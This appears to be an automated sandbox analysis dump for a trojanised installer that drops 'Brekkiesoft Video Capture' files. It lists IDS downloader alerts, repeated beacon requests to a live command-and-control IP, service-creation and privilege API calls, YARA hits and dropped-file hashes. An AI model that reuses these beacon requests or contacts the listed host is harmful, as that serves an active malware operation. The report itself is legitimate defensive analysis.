Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49922 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49897 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49944 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49909 -> 188.119.66.185:443
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49915 -> 188.119.66.185:443
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab312136e731defa6231e72eee7c4db7e40b82a8dcd6c946851e30088893250aa15d405633775b0e650fcba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda36261fdb308a HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: unknown | TCP traffic detected without corresponding DNS query: 188.119.66.185
                    Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C02B95 WSASetLastError,WSARecv,WSASetLastError,select, 6_2_02C02B95
                    Source: global traffic | DNS traffic detected: DNS query: time.windows.com
                    Source: list.tmp, 00000002.00000002.2504041070.0000000005AEE000.00000004.00001000.00020000.00000000.sdmp, bsoftvideocapture33.exe, 00000006.00000000.1278473609.00000000004D4000.00000002.00000001.01000000.0000000A.sdmp, BrekkiesoftVideoCapture.exe.6.dr, bsoftvideocapture33.exe.2.dr, is-7DT4P.tmp.2.dr | String found in binary or memory: http://wonderwork.ucoz.com/
                    Source: svchost.exe, 00000003.00000002.1376008864.000001769B213000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.bingmapsportal.com
                    Source: list.tmp, list.tmp, 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-FUIGA.tmp.2.dr, list.tmp.0.dr | String found in binary or memory: http://www.innosetup.com/
                    Source: list.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: list.exe | String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: list.exe, 00000000.00000003.1252614540.0000000002088000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252420844.0000000002380000.00000004.00001000.00020000.00000000.sdmp, list.tmp, list.tmp, 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-FUIGA.tmp.2.dr, list.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/ps
                    Source: list.exe, 00000000.00000003.1252614540.0000000002088000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252420844.0000000002380000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-FUIGA.tmp.2.dr, list.tmp.0.dr | String found in binary or memory: http://www.remobjects.com/psU
                    Source: list.exe, 00000000.00000002.2501420585.0000000002081000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252011519.0000000002380000.00000004.00001000.00020000.00000000.sdmp, list.exe, 00000000.00000003.1252079119.0000000002081000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000003.1254668449.0000000003230000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000002.2502938488.00000000021E8000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000003.1254793591.00000000021E8000.00000004.00001000.00020000.00000000.sdmp, list.tmp, 00000002.00000002.2502072974.0000000000786000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.easycutstudio.com/support.html
Source: unknown | Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown | Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown | Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown | Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49897
Source: unknown | Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown | Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49897 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown | Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown | Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown | Network traffic detected: HTTP traffic on port 49891 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown | Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown | Network traffic detected: HTTP traffic on port 49934 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49903
Source: unknown | Network traffic detected: HTTP traffic on port 49903 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown | HTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.7:49795 version: TLS 1.2
Source: is-B9LPS.tmp.2.dr | Binary or memory string: DirectDrawCreateExmemstr_47d3fa75-6
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0042F520 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00423B84 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004125D8 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00478AC0 NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00457594 PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0042E934: CreateFileA,DeviceIoControl,GetLastError,CloseHandle,SetLastError
Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_0040840C
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004706A8
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004809F7
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004352C8
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004673A4
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0043DD50
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0043035C
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004444C8
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004345C4
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00444A70
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00486BD0
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00430EE8
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0045F0C4
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00445168
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0045B174
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00469404
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00445574
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004519BC
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00487B30
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0048DF54
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_00401000
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_004067B7
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_609660FA
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6092114F
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6091F2C9
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6096923E
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6093323D
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6095C314
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60950312
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094D33B
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6093B368
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6096748C
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6093F42E
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60954470
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_609615FA
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6096A5EE
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6096D6A4
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_609606A8
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60932654
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60955665
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094B7DB
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6092F74D
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60964807
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094E9BC
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60937929
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6093FAD6
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6096DAE8
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_6094DA3A
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60936B27
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60954CF6
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60950C6B
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60966DF1
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60963D35
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60909E9C
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60951E86
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60912E0B
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_60954FF8
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C396C9
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C39687
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C39757
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C1BAFD
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C22A80
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C1D32F
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C170C0
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C0E07F
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C2267D
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C1B609
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C1874A
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C1BF15
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C20DB4
Source: Joe Sandbox View | Dropped File: C:\ProgramData\BrekkiesoftVideoCapture\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 00408C0C appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 00406AC4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 0040595C appears 117 times
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 00457F1C appears 73 times
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 00403400 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 00445DD4 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 00457D10 appears 96 times
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 004344DC appears 32 times
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 004078F4 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 00403494 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 00403684 appears 225 times
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 00453344 appears 97 times
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: String function: 004460A4 appears 59 times
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: String function: 02C17760 appears 32 times
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: String function: 02C22A10 appears 135 times
Source: list.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: list.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: list.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: is-FUIGA.tmp.2.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-FUIGA.tmp.2.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-FUIGA.tmp.2.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
Source: sqlite3.dll.6.dr | Static PE information: Number of sections : 19 > 10
Source: is-1B315.tmp.2.dr | Static PE information: Number of sections : 19 > 10
Source: list.exe, 00000000.00000003.1252614540.0000000002088000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs list.exe
Source: list.exe, 00000000.00000003.1252420844.0000000002380000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameshfolder.dll~/ vs list.exe
Source: list.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: classification engine | Classification label: mal100.troj.evad.winEXE@14/31@1/1
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_02C0F8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError
Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_004555E4 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_00455E0C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: CreateServiceA, 6_2_00401C47
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: CreateServiceA, 6_2_00401822
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: CreateServiceA, 6_2_00401CAB
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Code function: 2_2_0046E0E4 GetVersion,CoCreateInstance
Source: C:\Users\user\Desktop\list.exe | Code function: 0_2_00409C34 FindResourceA,SizeofResource,LoadResource,LockResource
Source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe | Code function: 6_2_004016B0 StartServiceCtrlDispatcherA,GlobalFree
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File created: C:\Users\user\AppData\Local\Programs
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6452:120:WilError_03
Source: C:\Users\user\Desktop\list.exe | File created: C:\Users\user~1\AppData\Local\Temp\is-QMI42.tmp
Source: Yara match | File source: 6.0.bsoftvideocapture33.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000000.1278089923.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2504041070.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: C:\ProgramData\BrekkiesoftVideoCapture\BrekkiesoftVideoCapture.exe, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\is-7DT4P.tmp, type: DROPPED
Source: Yara match | File source: C:\Users\user\AppData\Local\Brekkiesoft Video Capture 1.33\bsoftvideocapture33.exe, type: DROPPED
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\list.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-QMI42.tmp\list.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: bsoftvideocapture33.exe, bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: bsoftvideocapture33.exe, bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.dr | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.dr | Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: bsoftvideocapture33.exe, 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp, is-1B315.tmp.2.dr, sqlite3.dll.6.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
